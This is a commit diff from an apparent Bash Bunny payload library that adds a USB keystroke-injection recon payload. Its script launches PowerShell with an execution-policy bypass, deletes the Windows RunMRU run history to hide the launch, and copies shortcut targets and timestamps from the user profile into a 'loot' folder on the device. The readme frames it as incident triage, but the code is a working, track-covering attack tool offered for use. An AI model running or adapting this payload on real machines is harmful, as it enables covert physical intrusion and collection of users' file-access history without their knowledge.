Update and fix payloads (#277)

* Updated all Payloads for Version 1.2+

Fixed Style Issues on extensions and payloads.
Added GET TARGET_OS to get.sh
Removed and Fixed all uses ducky_helper.sh (Issue #248)
Removed all mention of DUCKY_LANG (Issue #248)
Renamed Payloads with spaces in name
Added an extension to keep Macs Happy
Added a payload for Mac DNS poisoning
Fixed Issue #271 changed wget to curl -o
Implemented PR #268
Implemented PR #273

* Fixed e.cmd

* Fix e.cmd pt2

* Fixed Issues

Fixed issues pointed out by @sebkinne
Fixed styling errors

payloads/library/recon/Link_File_analysis/payload.txt

@@ -0,0 +1,7 @@
+LED SETUP
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+LED ATTACK
+RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
+LED FINISH

payloads/library/recon/Link_File_analysis/readme.md

@@ -0,0 +1,28 @@
+Based on a payload written by Simen Kjeserud
+
+Tested on firmware 1.3
+
+Searches the user profile for .lnk files and reports on the file name,
+Target file, Date Created, Date Last Written. Results are provided in
+a CSV file.
+
+Output = \loot\Link-Files\link_files.csv
+
+Background
+In an incident where it is suspected that a user has exfiltrated
+data to a USB drive, the target element of any .lnk files may show 
+files on external media (i.e. not the C: drive.).
+
+Note - using this payload is NOT forensically sound!
+
+
+## STATUS
+
+| LED              | Status                                |
+| ---------------- | ------------------------------------- |
+| Purple (blinking)| Attack in progress                    |
+| Green (blinking) | Attack Finished                       |
+
+
+
+

payloads/library/recon/Link_File_analysis/run.ps1

@@ -0,0 +1,53 @@
+#Remove run history
+powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
+
+#Get the path and file name that you are using for output
+# find connected bashbunny drive:
+$VolumeName = "bashbunny"
+$computerSystem = Get-CimInstance CIM_ComputerSystem
+$backupDrive = $null
+get-wmiobject win32_logicaldisk | % {
+    if ($_.VolumeName -eq $VolumeName) {
+        $backupDrive = $_.DeviceID
+    }
+}
+
+#See if a loot folder exist in usb. If not create one
+$TARGETDIR = $backupDrive + "\loot"
+if(!(Test-Path -Path $TARGETDIR )){
+    New-Item -ItemType directory -Path $TARGETDIR
+}
+
+#See if a info folder exist in loot folder. If not create one
+$TARGETDIR = $backupDrive + "\loot\Link-Files"
+if(!(Test-Path -Path $TARGETDIR )){
+    New-Item -ItemType directory -Path $TARGETDIR
+}
+
+#Create a path that will be used to make the file
+$datetime = get-date -f yyyy-MM-dd_HH-mm
+$backupPath = $backupDrive + "\loot\Link-Files\"
+
+#Create output from info script
+$TARGETDIR = $MyInvocation.MyCommand.Path
+$TARGETDIR = $TARGETDIR -replace ".......$"
+cd $TARGETDIR
+
+$files = Get-ChildItem $env:USERPROFILE -Recurse -Filter *.lnk | select-object -Expand Fullname
+
+
+foreach ($file in $files)
+{
+
+$sh = New-Object -ComObject WScript.Shell
+$target = $sh.CreateShortcut($file).TargetPath
+$created = (Get-ItemProperty $file).CreationTime
+$written = (Get-ItemProperty $file).LastWriteTime
+
+[PSCustomObject]@{
+       Linkfile = $file
+       Target = $target 
+       File_Created = $created
+       Last_Written = $written
+       } | Export-Csv $backupPath\link_files.csv -notype -Append 
+}